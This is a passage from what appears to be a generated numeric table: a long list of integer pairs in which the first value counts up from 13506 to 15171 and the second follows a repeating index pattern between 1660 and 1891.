(13506, 1671),
(13507, 1672),
(13508, 1673),
(13509, 1674),
(13510, 1675),
(13511, 1676),
(13512, 1677),
(13513, 1678),
(13514, 1679),
(13515, 1680),
(13516, 1681),
(13517, 1682),
(13518, 1683),
(13519, 1684),
(13520, 1685),
(13521, 1686),
(13522, 1687),
(13523, 1688),
(13524, 1689),
(13525, 1690),
(13526, 1691),
(13527, 1692),
(13528, 1693),
(13529, 1694),
(13530, 1695),
(13531, 1696),
(13532, 1697),
(13533, 1698),
(13534, 1699),
(13535, 1700),
(13536, 1701),
(13537, 1702),
(13538, 1703),
(13539, 1704),
(13540, 1705),
(13541, 1706),
(13542, 1707),
(13543, 1708),
(13544, 1709),
(13545, 1710),
(13546, 1711),
(13547, 1712),
(13548, 1713),
(13549, 1714),
(13550, 1715),
(13551, 1716),
(13552, 1717),
(13553, 1718),
(13554, 1719),
(13555, 1720),
(13556, 1721),
(13557, 1722),
(13558, 1723),
(13559, 1724),
(13560, 1725),
(13561, 1726),
(13562, 1727),
(13563, 1728),
(13564, 1729),
(13565, 1730),
(13566, 1731),
(13567, 1732),
(13568, 1733),
(13569, 1734),
(13570, 1735),
(13571, 1736),
(13572, 1737),
(13573, 1738),
(13574, 1739),
(13575, 1740),
(13576, 1741),
(13577, 1742),
(13578, 1743),
(13579, 1744),
(13580, 1745),
(13581, 1746),
(13582, 1747),
(13583, 1748),
(13584, 1749),
(13585, 1750),
(13586, 1751),
(13587, 1752),
(13588, 1753),
(13589, 1754),
(13590, 1755),
(13591, 1756),
(13592, 1757),
(13593, 1758),
(13594, 1759),
(13595, 1660),
(13596, 1661),
(13597, 1662),
(13598, 1663),
(13599, 1664),
(13600, 1665),
(13601, 1666),
(13602, 1667),
(13603, 1668),
(13604, 1669),
(13605, 1670),
(13606, 1671),
(13607, 1672),
(13608, 1673),
(13609, 1674),
(13610, 1675),
(13611, 1676),
(13612, 1677),
(13613, 1678),
(13614, 1679),
(13615, 1680),
(13616, 1681),
(13617, 1682),
(13618, 1683),
(13619, 1684),
(13620, 1685),
(13621, 1686),
(13622, 1687),
(13623, 1688),
(13624, 1689),
(13625, 1690),
(13626, 1691),
(13627, 1692),
(13628, 1693),
(13629, 1694),
(13630, 1695),
(13631, 1696),
(13632, 1697),
(13633, 1698),
(13634, 1699),
(13635, 1700),
(13636, 1701),
(13637, 1702),
(13638, 1703),
(13639, 1704),
(13640, 1705),
(13641, 1706),
(13642, 1707),
(13643, 1708),
(13644, 1709),
(13645, 1710),
(13646, 1711),
(13647, 1712),
(13648, 1713),
(13649, 1714),
(13650, 1715),
(13651, 1716),
(13652, 1717),
(13653, 1718),
(13654, 1719),
(13655, 1720),
(13656, 1721),
(13657, 1722),
(13658, 1723),
(13659, 1724),
(13660, 1725),
(13661, 1726),
(13662, 1727),
(13663, 1728),
(13664, 1729),
(13665, 1730),
(13666, 1731),
(13667, 1732),
(13668, 1733),
(13669, 1734),
(13670, 1735),
(13671, 1736),
(13672, 1737),
(13673, 1738),
(13674, 1739),
(13675, 1740),
(13676, 1741),
(13677, 1742),
(13678, 1743),
(13679, 1744),
(13680, 1745),
(13681, 1746),
(13682, 1747),
(13683, 1748),
(13684, 1749),
(13685, 1750),
(13686, 1751),
(13687, 1752),
(13688, 1753),
(13689, 1754),
(13690, 1755),
(13691, 1756),
(13692, 1757),
(13693, 1758),
(13694, 1759),
(13695, 1660),
(13696, 1660),
(13697, 1660),
(13698, 1660),
(13699, 1660),
(13700, 1660),
(13701, 1661),
(13702, 1661),
(13703, 1661),
(13704, 1661),
(13705, 1661),
(13706, 1661),
(13707, 1662),
(13708, 1662),
(13709, 1662),
(13710, 1662),
(13711, 1662),
(13712, 1662),
(13713, 1663),
(13714, 1663),
(13715, 1663),
(13716, 1663),
(13717, 1663),
(13718, 1663),
(13719, 1664),
(13720, 1664),
(13721, 1664),
(13722, 1664),
(13723, 1664),
(13724, 1664),
(13725, 1665),
(13726, 1665),
(13727, 1665),
(13728, 1665),
(13729, 1665),
(13730, 1665),
(13731, 1665),
(13732, 1665),
(13733, 1665),
(13734, 1666),
(13735, 1666),
(13736, 1666),
(13737, 1666),
(13738, 1666),
(13739, 1666),
(13740, 1667),
(13741, 1667),
(13742, 1667),
(13743, 1667),
(13744, 1667),
(13745, 1667),
(13746, 1668),
(13747, 1668),
(13748, 1668),
(13749, 1668),
(13750, 1668),
(13751, 1668),
(13752, 1669),
(13753, 1669),
(13754, 1669),
(13755, 1669),
(13756, 1669),
(13757, 1669),
(13758, 1670),
(13759, 1670),
(13760, 1670),
(13761, 1670),
(13762, 1670),
(13763, 1670),
(13764, 1671),
(13765, 1671),
(13766, 1671),
(13767, 1671),
(13768, 1671),
(13769, 1671),
(13770, 1672),
(13771, 1672),
(13772, 1672),
(13773, 1672),
(13774, 1672),
(13775, 1672),
(13776, 1673),
(13777, 1673),
(13778, 1673),
(13779, 1673),
(13780, 1673),
(13781, 1673),
(13782, 1674),
(13783, 1674),
(13784, 1674),
(13785, 1674),
(13786, 1674),
(13787, 1674),
(13788, 1675),
(13789, 1675),
(13790, 1675),
(13791, 1675),
(13792, 1675),
(13793, 1675),
(13794, 1676),
(13795, 1676),
(13796, 1676),
(13797, 1676),
(13798, 1676),
(13799, 1676),
(13800, 1677),
(13801, 1677),
(13802, 1677),
(13803, 1677),
(13804, 1677),
(13805, 1677),
(13806, 1678),
(13807, 1678),
(13808, 1678),
(13809, 1678),
(13810, 1678),
(13811, 1678),
(13812, 1679),
(13813, 1679),
(13814, 1679),
(13815, 1679),
(13816, 1679),
(13817, 1679),
(13818, 1680),
(13819, 1680),
(13820, 1680),
(13821, 1680),
(13822, 1680),
(13823, 1680),
(13824, 1681),
(13825, 1681),
(13826, 1681),
(13827, 1681),
(13828, 1681),
(13829, 1681),
(13830, 1681),
(13831, 1681),
(13832, 1681),
(13833, 1682),
(13834, 1682),
(13835, 1682),
(13836, 1682),
(13837, 1682),
(13838, 1682),
(13839, 1683),
(13840, 1683),
(13841, 1683),
(13842, 1683),
(13843, 1683),
(13844, 1683),
(13845, 1684),
(13846, 1684),
(13847, 1684),
(13848, 1684),
(13849, 1684),
(13850, 1684),
(13851, 1685),
(13852, 1685),
(13853, 1685),
(13854, 1685),
(13855, 1685),
(13856, 1685),
(13857, 1686),
(13858, 1686),
(13859, 1686),
(13860, 1686),
(13861, 1686),
(13862, 1686),
(13863, 1687),
(13864, 1687),
(13865, 1687),
(13866, 1687),
(13867, 1687),
(13868, 1687),
(13869, 1688),
(13870, 1688),
(13871, 1688),
(13872, 1688),
(13873, 1688),
(13874, 1688),
(13875, 1689),
(13876, 1689),
(13877, 1689),
(13878, 1689),
(13879, 1689),
(13880, 1689),
(13881, 1690),
(13882, 1690),
(13883, 1690),
(13884, 1690),
(13885, 1690),
(13886, 1690),
(13887, 1691),
(13888, 1691),
(13889, 1691),
(13890, 1691),
(13891, 1691),
(13892, 1691),
(13893, 1692),
(13894, 1692),
(13895, 1692),
(13896, 1692),
(13897, 1692),
(13898, 1692),
(13899, 1693),
(13900, 1693),
(13901, 1693),
(13902, 1693),
(13903, 1693),
(13904, 1693),
(13905, 1694),
(13906, 1694),
(13907, 1694),
(13908, 1694),
(13909, 1694),
(13910, 1694),
(13911, 1695),
(13912, 1695),
(13913, 1695),
(13914, 1695),
(13915, 1695),
(13916, 1695),
(13917, 1696),
(13918, 1696),
(13919, 1696),
(13920, 1696),
(13921, 1696),
(13922, 1696),
(13923, 1697),
(13924, 1697),
(13925, 1697),
(13926, 1697),
(13927, 1697),
(13928, 1697),
(13929, 1697),
(13930, 1697),
(13931, 1697),
(13932, 1698),
(13933, 1698),
(13934, 1698),
(13935, 1698),
(13936, 1698),
(13937, 1698),
(13938, 1699),
(13939, 1699),
(13940, 1699),
(13941, 1699),
(13942, 1699),
(13943, 1699),
(13944, 1700),
(13945, 1700),
(13946, 1700),
(13947, 1700),
(13948, 1700),
(13949, 1700),
(13950, 1701),
(13951, 1701),
(13952, 1701),
(13953, 1701),
(13954, 1701),
(13955, 1701),
(13956, 1702),
(13957, 1702),
(13958, 1702),
(13959, 1702),
(13960, 1702),
(13961, 1702),
(13962, 1703),
(13963, 1703),
(13964, 1703),
(13965, 1703),
(13966, 1703),
(13967, 1703),
(13968, 1704),
(13969, 1704),
(13970, 1704),
(13971, 1704),
(13972, 1704),
(13973, 1704),
(13974, 1705),
(13975, 1705),
(13976, 1705),
(13977, 1705),
(13978, 1705),
(13979, 1705),
(13980, 1706),
(13981, 1706),
(13982, 1706),
(13983, 1706),
(13984, 1706),
(13985, 1706),
(13986, 1707),
(13987, 1707),
(13988, 1707),
(13989, 1707),
(13990, 1707),
(13991, 1707),
(13992, 1708),
(13993, 1708),
(13994, 1708),
(13995, 1708),
(13996, 1708),
(13997, 1708),
(13998, 1709),
(13999, 1709),
(14000, 1709),
(14001, 1709),
(14002, 1709),
(14003, 1709),
(14004, 1710),
(14005, 1710),
(14006, 1710),
(14007, 1710),
(14008, 1710),
(14009, 1710),
(14010, 1711),
(14011, 1711),
(14012, 1711),
(14013, 1711),
(14014, 1711),
(14015, 1711),
(14016, 1712),
(14017, 1712),
(14018, 1712),
(14019, 1712),
(14020, 1712),
(14021, 1712),
(14022, 1713),
(14023, 1713),
(14024, 1713),
(14025, 1713),
(14026, 1713),
(14027, 1713),
(14028, 1713),
(14029, 1713),
(14030, 1713),
(14031, 1714),
(14032, 1714),
(14033, 1714),
(14034, 1714),
(14035, 1714),
(14036, 1714),
(14037, 1715),
(14038, 1715),
(14039, 1715),
(14040, 1715),
(14041, 1715),
(14042, 1715),
(14043, 1716),
(14044, 1716),
(14045, 1716),
(14046, 1716),
(14047, 1716),
(14048, 1716),
(14049, 1717),
(14050, 1717),
(14051, 1717),
(14052, 1717),
(14053, 1717),
(14054, 1717),
(14055, 1718),
(14056, 1718),
(14057, 1718),
(14058, 1718),
(14059, 1718),
(14060, 1718),
(14061, 1719),
(14062, 1719),
(14063, 1719),
(14064, 1719),
(14065, 1719),
(14066, 1719),
(14067, 1720),
(14068, 1720),
(14069, 1720),
(14070, 1720),
(14071, 1720),
(14072, 1720),
(14073, 1721),
(14074, 1721),
(14075, 1721),
(14076, 1721),
(14077, 1721),
(14078, 1721),
(14079, 1722),
(14080, 1722),
(14081, 1722),
(14082, 1722),
(14083, 1722),
(14084, 1722),
(14085, 1723),
(14086, 1723),
(14087, 1723),
(14088, 1723),
(14089, 1723),
(14090, 1723),
(14091, 1724),
(14092, 1724),
(14093, 1724),
(14094, 1724),
(14095, 1724),
(14096, 1724),
(14097, 1725),
(14098, 1725),
(14099, 1725),
(14100, 1725),
(14101, 1725),
(14102, 1725),
(14103, 1726),
(14104, 1726),
(14105, 1726),
(14106, 1726),
(14107, 1726),
(14108, 1726),
(14109, 1727),
(14110, 1727),
(14111, 1727),
(14112, 1727),
(14113, 1727),
(14114, 1727),
(14115, 1728),
(14116, 1728),
(14117, 1728),
(14118, 1728),
(14119, 1728),
(14120, 1728),
(14121, 1729),
(14122, 1729),
(14123, 1729),
(14124, 1729),
(14125, 1729),
(14126, 1729),
(14127, 1729),
(14128, 1729),
(14129, 1729),
(14130, 1730),
(14131, 1730),
(14132, 1730),
(14133, 1730),
(14134, 1730),
(14135, 1730),
(14136, 1731),
(14137, 1731),
(14138, 1731),
(14139, 1731),
(14140, 1731),
(14141, 1731),
(14142, 1732),
(14143, 1732),
(14144, 1732),
(14145, 1732),
(14146, 1732),
(14147, 1732),
(14148, 1733),
(14149, 1733),
(14150, 1733),
(14151, 1733),
(14152, 1733),
(14153, 1733),
(14154, 1734),
(14155, 1734),
(14156, 1734),
(14157, 1734),
(14158, 1734),
(14159, 1734),
(14160, 1735),
(14161, 1735),
(14162, 1735),
(14163, 1735),
(14164, 1735),
(14165, 1735),
(14166, 1736),
(14167, 1736),
(14168, 1736),
(14169, 1736),
(14170, 1736),
(14171, 1736),
(14172, 1737),
(14173, 1737),
(14174, 1737),
(14175, 1737),
(14176, 1737),
(14177, 1737),
(14178, 1738),
(14179, 1738),
(14180, 1738),
(14181, 1738),
(14182, 1738),
(14183, 1738),
(14184, 1739),
(14185, 1739),
(14186, 1739),
(14187, 1739),
(14188, 1739),
(14189, 1739),
(14190, 1740),
(14191, 1740),
(14192, 1740),
(14193, 1740),
(14194, 1740),
(14195, 1740),
(14196, 1741),
(14197, 1741),
(14198, 1741),
(14199, 1741),
(14200, 1741),
(14201, 1741),
(14202, 1742),
(14203, 1742),
(14204, 1742),
(14205, 1742),
(14206, 1742),
(14207, 1742),
(14208, 1743),
(14209, 1743),
(14210, 1743),
(14211, 1743),
(14212, 1743),
(14213, 1743),
(14214, 1744),
(14215, 1744),
(14216, 1744),
(14217, 1744),
(14218, 1744),
(14219, 1744),
(14220, 1745),
(14221, 1745),
(14222, 1745),
(14223, 1745),
(14224, 1745),
(14225, 1745),
(14226, 1745),
(14227, 1745),
(14228, 1745),
(14229, 1746),
(14230, 1746),
(14231, 1746),
(14232, 1746),
(14233, 1746),
(14234, 1746),
(14235, 1747),
(14236, 1747),
(14237, 1747),
(14238, 1747),
(14239, 1747),
(14240, 1747),
(14241, 1748),
(14242, 1748),
(14243, 1748),
(14244, 1748),
(14245, 1748),
(14246, 1748),
(14247, 1749),
(14248, 1749),
(14249, 1749),
(14250, 1749),
(14251, 1749),
(14252, 1749),
(14253, 1750),
(14254, 1750),
(14255, 1750),
(14256, 1750),
(14257, 1750),
(14258, 1750),
(14259, 1751),
(14260, 1751),
(14261, 1751),
(14262, 1751),
(14263, 1751),
(14264, 1751),
(14265, 1752),
(14266, 1752),
(14267, 1752),
(14268, 1752),
(14269, 1752),
(14270, 1752),
(14271, 1753),
(14272, 1753),
(14273, 1753),
(14274, 1753),
(14275, 1753),
(14276, 1753),
(14277, 1754),
(14278, 1754),
(14279, 1754),
(14280, 1754),
(14281, 1754),
(14282, 1754),
(14283, 1755),
(14284, 1755),
(14285, 1755),
(14286, 1755),
(14287, 1755),
(14288, 1755),
(14289, 1756),
(14290, 1756),
(14291, 1756),
(14292, 1756),
(14293, 1756),
(14294, 1756),
(14295, 1757),
(14296, 1757),
(14297, 1757),
(14298, 1757),
(14299, 1757),
(14300, 1757),
(14301, 1758),
(14302, 1758),
(14303, 1758),
(14304, 1758),
(14305, 1758),
(14306, 1758),
(14307, 1759),
(14308, 1759),
(14309, 1759),
(14310, 1759),
(14311, 1759),
(14312, 1759),
(14313, 1760),
(14314, 1761),
(14315, 1762),
(14316, 1763),
(14317, 1764),
(14318, 1765),
(14319, 1766),
(14320, 1767),
(14321, 1768),
(14322, 1769),
(14323, 1770),
(14324, 1771),
(14325, 1772),
(14326, 1773),
(14327, 1774),
(14328, 1775),
(14329, 1776),
(14330, 1777),
(14331, 1778),
(14332, 1779),
(14333, 1780),
(14334, 1781),
(14335, 1782),
(14336, 1783),
(14337, 1784),
(14338, 1785),
(14339, 1786),
(14340, 1787),
(14341, 1788),
(14342, 1789),
(14343, 1790),
(14344, 1791),
(14345, 1792),
(14346, 1793),
(14347, 1794),
(14348, 1795),
(14349, 1796),
(14350, 1797),
(14351, 1798),
(14352, 1799),
(14353, 1800),
(14354, 1801),
(14355, 1802),
(14356, 1803),
(14357, 1804),
(14358, 1805),
(14359, 1806),
(14360, 1807),
(14361, 1808),
(14362, 1809),
(14363, 1810),
(14364, 1811),
(14365, 1812),
(14366, 1813),
(14367, 1814),
(14368, 1815),
(14369, 1816),
(14370, 1817),
(14371, 1818),
(14372, 1819),
(14373, 1820),
(14374, 1821),
(14375, 1822),
(14376, 1823),
(14377, 1824),
(14378, 1825),
(14379, 1826),
(14380, 1827),
(14381, 1828),
(14382, 1829),
(14383, 1830),
(14384, 1831),
(14385, 1832),
(14386, 1833),
(14387, 1834),
(14388, 1835),
(14389, 1836),
(14390, 1837),
(14391, 1838),
(14392, 1839),
(14393, 1840),
(14394, 1841),
(14395, 1842),
(14396, 1843),
(14397, 1844),
(14398, 1845),
(14399, 1846),
(14400, 1847),
(14401, 1848),
(14402, 1849),
(14403, 1850),
(14404, 1851),
(14405, 1852),
(14406, 1853),
(14407, 1854),
(14408, 1855),
(14409, 1856),
(14410, 1857),
(14411, 1858),
(14412, 1859),
(14413, 1760),
(14414, 1761),
(14415, 1762),
(14416, 1763),
(14417, 1764),
(14418, 1765),
(14419, 1766),
(14420, 1767),
(14421, 1768),
(14422, 1769),
(14423, 1770),
(14424, 1771),
(14425, 1772),
(14426, 1773),
(14427, 1774),
(14428, 1775),
(14429, 1776),
(14430, 1777),
(14431, 1778),
(14432, 1779),
(14433, 1780),
(14434, 1781),
(14435, 1782),
(14436, 1783),
(14437, 1784),
(14438, 1785),
(14439, 1786),
(14440, 1787),
(14441, 1788),
(14442, 1789),
(14443, 1790),
(14444, 1791),
(14445, 1792),
(14446, 1793),
(14447, 1794),
(14448, 1795),
(14449, 1796),
(14450, 1797),
(14451, 1798),
(14452, 1799),
(14453, 1800),
(14454, 1801),
(14455, 1802),
(14456, 1803),
(14457, 1804),
(14458, 1805),
(14459, 1806),
(14460, 1807),
(14461, 1808),
(14462, 1809),
(14463, 1810),
(14464, 1811),
(14465, 1812),
(14466, 1813),
(14467, 1814),
(14468, 1815),
(14469, 1816),
(14470, 1817),
(14471, 1818),
(14472, 1819),
(14473, 1820),
(14474, 1821),
(14475, 1822),
(14476, 1823),
(14477, 1824),
(14478, 1825),
(14479, 1826),
(14480, 1827),
(14481, 1828),
(14482, 1829),
(14483, 1830),
(14484, 1831),
(14485, 1832),
(14486, 1833),
(14487, 1834),
(14488, 1835),
(14489, 1836),
(14490, 1837),
(14491, 1838),
(14492, 1839),
(14493, 1840),
(14494, 1841),
(14495, 1842),
(14496, 1843),
(14497, 1844),
(14498, 1845),
(14499, 1846),
(14500, 1847),
(14501, 1848),
(14502, 1849),
(14503, 1850),
(14504, 1851),
(14505, 1852),
(14506, 1853),
(14507, 1854),
(14508, 1855),
(14509, 1856),
(14510, 1857),
(14511, 1858),
(14512, 1859),
(14513, 1760),
(14514, 1760),
(14515, 1760),
(14516, 1760),
(14517, 1760),
(14518, 1760),
(14519, 1761),
(14520, 1761),
(14521, 1761),
(14522, 1761),
(14523, 1761),
(14524, 1761),
(14525, 1761),
(14526, 1761),
(14527, 1761),
(14528, 1762),
(14529, 1762),
(14530, 1762),
(14531, 1762),
(14532, 1762),
(14533, 1762),
(14534, 1763),
(14535, 1763),
(14536, 1763),
(14537, 1763),
(14538, 1763),
(14539, 1763),
(14540, 1764),
(14541, 1764),
(14542, 1764),
(14543, 1764),
(14544, 1764),
(14545, 1764),
(14546, 1765),
(14547, 1765),
(14548, 1765),
(14549, 1765),
(14550, 1765),
(14551, 1765),
(14552, 1766),
(14553, 1766),
(14554, 1766),
(14555, 1766),
(14556, 1766),
(14557, 1766),
(14558, 1767),
(14559, 1767),
(14560, 1767),
(14561, 1767),
(14562, 1767),
(14563, 1767),
(14564, 1768),
(14565, 1768),
(14566, 1768),
(14567, 1768),
(14568, 1768),
(14569, 1768),
(14570, 1769),
(14571, 1769),
(14572, 1769),
(14573, 1769),
(14574, 1769),
(14575, 1769),
(14576, 1770),
(14577, 1770),
(14578, 1770),
(14579, 1770),
(14580, 1770),
(14581, 1770),
(14582, 1771),
(14583, 1771),
(14584, 1771),
(14585, 1771),
(14586, 1771),
(14587, 1771),
(14588, 1772),
(14589, 1772),
(14590, 1772),
(14591, 1772),
(14592, 1772),
(14593, 1772),
(14594, 1773),
(14595, 1773),
(14596, 1773),
(14597, 1773),
(14598, 1773),
(14599, 1773),
(14600, 1774),
(14601, 1774),
(14602, 1774),
(14603, 1774),
(14604, 1774),
(14605, 1774),
(14606, 1775),
(14607, 1775),
(14608, 1775),
(14609, 1775),
(14610, 1775),
(14611, 1775),
(14612, 1776),
(14613, 1776),
(14614, 1776),
(14615, 1776),
(14616, 1776),
(14617, 1776),
(14618, 1777),
(14619, 1777),
(14620, 1777),
(14621, 1777),
(14622, 1777),
(14623, 1777),
(14624, 1777),
(14625, 1777),
(14626, 1777),
(14627, 1778),
(14628, 1778),
(14629, 1778),
(14630, 1778),
(14631, 1778),
(14632, 1778),
(14633, 1779),
(14634, 1779),
(14635, 1779),
(14636, 1779),
(14637, 1779),
(14638, 1779),
(14639, 1780),
(14640, 1780),
(14641, 1780),
(14642, 1780),
(14643, 1780),
(14644, 1780),
(14645, 1781),
(14646, 1781),
(14647, 1781),
(14648, 1781),
(14649, 1781),
(14650, 1781),
(14651, 1782),
(14652, 1782),
(14653, 1782),
(14654, 1782),
(14655, 1782),
(14656, 1782),
(14657, 1783),
(14658, 1783),
(14659, 1783),
(14660, 1783),
(14661, 1783),
(14662, 1783),
(14663, 1784),
(14664, 1784),
(14665, 1784),
(14666, 1784),
(14667, 1784),
(14668, 1784),
(14669, 1785),
(14670, 1785),
(14671, 1785),
(14672, 1785),
(14673, 1785),
(14674, 1785),
(14675, 1786),
(14676, 1786),
(14677, 1786),
(14678, 1786),
(14679, 1786),
(14680, 1786),
(14681, 1787),
(14682, 1787),
(14683, 1787),
(14684, 1787),
(14685, 1787),
(14686, 1787),
(14687, 1788),
(14688, 1788),
(14689, 1788),
(14690, 1788),
(14691, 1788),
(14692, 1788),
(14693, 1789),
(14694, 1789),
(14695, 1789),
(14696, 1789),
(14697, 1789),
(14698, 1789),
(14699, 1790),
(14700, 1790),
(14701, 1790),
(14702, 1790),
(14703, 1790),
(14704, 1790),
(14705, 1791),
(14706, 1791),
(14707, 1791),
(14708, 1791),
(14709, 1791),
(14710, 1791),
(14711, 1792),
(14712, 1792),
(14713, 1792),
(14714, 1792),
(14715, 1792),
(14716, 1792),
(14717, 1793),
(14718, 1793),
(14719, 1793),
(14720, 1793),
(14721, 1793),
(14722, 1793),
(14723, 1793),
(14724, 1793),
(14725, 1793),
(14726, 1794),
(14727, 1794),
(14728, 1794),
(14729, 1794),
(14730, 1794),
(14731, 1794),
(14732, 1795),
(14733, 1795),
(14734, 1795),
(14735, 1795),
(14736, 1795),
(14737, 1795),
(14738, 1796),
(14739, 1796),
(14740, 1796),
(14741, 1796),
(14742, 1796),
(14743, 1796),
(14744, 1797),
(14745, 1797),
(14746, 1797),
(14747, 1797),
(14748, 1797),
(14749, 1797),
(14750, 1798),
(14751, 1798),
(14752, 1798),
(14753, 1798),
(14754, 1798),
(14755, 1798),
(14756, 1799),
(14757, 1799),
(14758, 1799),
(14759, 1799),
(14760, 1799),
(14761, 1799),
(14762, 1800),
(14763, 1800),
(14764, 1800),
(14765, 1800),
(14766, 1800),
(14767, 1800),
(14768, 1801),
(14769, 1801),
(14770, 1801),
(14771, 1801),
(14772, 1801),
(14773, 1801),
(14774, 1802),
(14775, 1802),
(14776, 1802),
(14777, 1802),
(14778, 1802),
(14779, 1802),
(14780, 1803),
(14781, 1803),
(14782, 1803),
(14783, 1803),
(14784, 1803),
(14785, 1803),
(14786, 1804),
(14787, 1804),
(14788, 1804),
(14789, 1804),
(14790, 1804),
(14791, 1804),
(14792, 1805),
(14793, 1805),
(14794, 1805),
(14795, 1805),
(14796, 1805),
(14797, 1805),
(14798, 1806),
(14799, 1806),
(14800, 1806),
(14801, 1806),
(14802, 1806),
(14803, 1806),
(14804, 1807),
(14805, 1807),
(14806, 1807),
(14807, 1807),
(14808, 1807),
(14809, 1807),
(14810, 1808),
(14811, 1808),
(14812, 1808),
(14813, 1808),
(14814, 1808),
(14815, 1808),
(14816, 1809),
(14817, 1809),
(14818, 1809),
(14819, 1809),
(14820, 1809),
(14821, 1809),
(14822, 1809),
(14823, 1809),
(14824, 1809),
(14825, 1810),
(14826, 1810),
(14827, 1810),
(14828, 1810),
(14829, 1810),
(14830, 1810),
(14831, 1811),
(14832, 1811),
(14833, 1811),
(14834, 1811),
(14835, 1811),
(14836, 1811),
(14837, 1812),
(14838, 1812),
(14839, 1812),
(14840, 1812),
(14841, 1812),
(14842, 1812),
(14843, 1813),
(14844, 1813),
(14845, 1813),
(14846, 1813),
(14847, 1813),
(14848, 1813),
(14849, 1814),
(14850, 1814),
(14851, 1814),
(14852, 1814),
(14853, 1814),
(14854, 1814),
(14855, 1815),
(14856, 1815),
(14857, 1815),
(14858, 1815),
(14859, 1815),
(14860, 1815),
(14861, 1816),
(14862, 1816),
(14863, 1816),
(14864, 1816),
(14865, 1816),
(14866, 1816),
(14867, 1817),
(14868, 1817),
(14869, 1817),
(14870, 1817),
(14871, 1817),
(14872, 1817),
(14873, 1818),
(14874, 1818),
(14875, 1818),
(14876, 1818),
(14877, 1818),
(14878, 1818),
(14879, 1819),
(14880, 1819),
(14881, 1819),
(14882, 1819),
(14883, 1819),
(14884, 1819),
(14885, 1820),
(14886, 1820),
(14887, 1820),
(14888, 1820),
(14889, 1820),
(14890, 1820),
(14891, 1821),
(14892, 1821),
(14893, 1821),
(14894, 1821),
(14895, 1821),
(14896, 1821),
(14897, 1822),
(14898, 1822),
(14899, 1822),
(14900, 1822),
(14901, 1822),
(14902, 1822),
(14903, 1823),
(14904, 1823),
(14905, 1823),
(14906, 1823),
(14907, 1823),
(14908, 1823),
(14909, 1824),
(14910, 1824),
(14911, 1824),
(14912, 1824),
(14913, 1824),
(14914, 1824),
(14915, 1825),
(14916, 1825),
(14917, 1825),
(14918, 1825),
(14919, 1825),
(14920, 1825),
(14921, 1825),
(14922, 1825),
(14923, 1825),
(14924, 1826),
(14925, 1826),
(14926, 1826),
(14927, 1826),
(14928, 1826),
(14929, 1826),
(14930, 1827),
(14931, 1827),
(14932, 1827),
(14933, 1827),
(14934, 1827),
(14935, 1827),
(14936, 1828),
(14937, 1828),
(14938, 1828),
(14939, 1828),
(14940, 1828),
(14941, 1828),
(14942, 1829),
(14943, 1829),
(14944, 1829),
(14945, 1829),
(14946, 1829),
(14947, 1829),
(14948, 1830),
(14949, 1830),
(14950, 1830),
(14951, 1830),
(14952, 1830),
(14953, 1830),
(14954, 1831),
(14955, 1831),
(14956, 1831),
(14957, 1831),
(14958, 1831),
(14959, 1831),
(14960, 1832),
(14961, 1832),
(14962, 1832),
(14963, 1832),
(14964, 1832),
(14965, 1832),
(14966, 1832),
(14967, 1832),
(14968, 1832),
(14969, 1833),
(14970, 1833),
(14971, 1833),
(14972, 1833),
(14973, 1833),
(14974, 1833),
(14975, 1834),
(14976, 1834),
(14977, 1834),
(14978, 1834),
(14979, 1834),
(14980, 1834),
(14981, 1835),
(14982, 1835),
(14983, 1835),
(14984, 1835),
(14985, 1835),
(14986, 1835),
(14987, 1836),
(14988, 1836),
(14989, 1836),
(14990, 1836),
(14991, 1836),
(14992, 1836),
(14993, 1837),
(14994, 1837),
(14995, 1837),
(14996, 1837),
(14997, 1837),
(14998, 1837),
(14999, 1838),
(15000, 1838),
(15001, 1838),
(15002, 1838),
(15003, 1838),
(15004, 1838),
(15005, 1839),
(15006, 1839),
(15007, 1839),
(15008, 1839),
(15009, 1839),
(15010, 1839),
(15011, 1839),
(15012, 1839),
(15013, 1839),
(15014, 1840),
(15015, 1840),
(15016, 1840),
(15017, 1840),
(15018, 1840),
(15019, 1840),
(15020, 1841),
(15021, 1841),
(15022, 1841),
(15023, 1841),
(15024, 1841),
(15025, 1841),
(15026, 1842),
(15027, 1842),
(15028, 1842),
(15029, 1842),
(15030, 1842),
(15031, 1842),
(15032, 1843),
(15033, 1843),
(15034, 1843),
(15035, 1843),
(15036, 1843),
(15037, 1843),
(15038, 1844),
(15039, 1844),
(15040, 1844),
(15041, 1844),
(15042, 1844),
(15043, 1844),
(15044, 1845),
(15045, 1845),
(15046, 1845),
(15047, 1845),
(15048, 1845),
(15049, 1845),
(15050, 1846),
(15051, 1846),
(15052, 1846),
(15053, 1846),
(15054, 1846),
(15055, 1846),
(15056, 1846),
(15057, 1846),
(15058, 1846),
(15059, 1847),
(15060, 1847),
(15061, 1847),
(15062, 1847),
(15063, 1847),
(15064, 1847),
(15065, 1848),
(15066, 1848),
(15067, 1848),
(15068, 1848),
(15069, 1848),
(15070, 1848),
(15071, 1849),
(15072, 1849),
(15073, 1849),
(15074, 1849),
(15075, 1849),
(15076, 1849),
(15077, 1850),
(15078, 1850),
(15079, 1850),
(15080, 1850),
(15081, 1850),
(15082, 1850),
(15083, 1851),
(15084, 1851),
(15085, 1851),
(15086, 1851),
(15087, 1851),
(15088, 1851),
(15089, 1852),
(15090, 1852),
(15091, 1852),
(15092, 1852),
(15093, 1852),
(15094, 1852),
(15095, 1853),
(15096, 1853),
(15097, 1853),
(15098, 1853),
(15099, 1853),
(15100, 1853),
(15101, 1853),
(15102, 1853),
(15103, 1853),
(15104, 1854),
(15105, 1854),
(15106, 1854),
(15107, 1854),
(15108, 1854),
(15109, 1854),
(15110, 1855),
(15111, 1855),
(15112, 1855),
(15113, 1855),
(15114, 1855),
(15115, 1855),
(15116, 1856),
(15117, 1856),
(15118, 1856),
(15119, 1856),
(15120, 1856),
(15121, 1856),
(15122, 1857),
(15123, 1857),
(15124, 1857),
(15125, 1857),
(15126, 1857),
(15127, 1857),
(15128, 1858),
(15129, 1858),
(15130, 1858),
(15131, 1858),
(15132, 1858),
(15133, 1858),
(15134, 1859),
(15135, 1859),
(15136, 1859),
(15137, 1859),
(15138, 1859),
(15139, 1859),
(15140, 1860),
(15141, 1861),
(15142, 1862),
(15143, 1863),
(15144, 1864),
(15145, 1865),
(15146, 1866),
(15147, 1867),
(15148, 1868),
(15149, 1869),
(15150, 1870),
(15151, 1871),
(15152, 1872),
(15153, 1873),
(15154, 1874),
(15155, 1875),
(15156, 1876),
(15157, 1877),
(15158, 1878),
(15159, 1879),
(15160, 1880),
(15161, 1881),
(15162, 1882),
(15163, 1883),
(15164, 1884),
(15165, 1885),
(15166, 1886),
(15167, 1887),
(15168, 1888),
(15169, 1889),
(15170, 1890),
(15171, 1891),
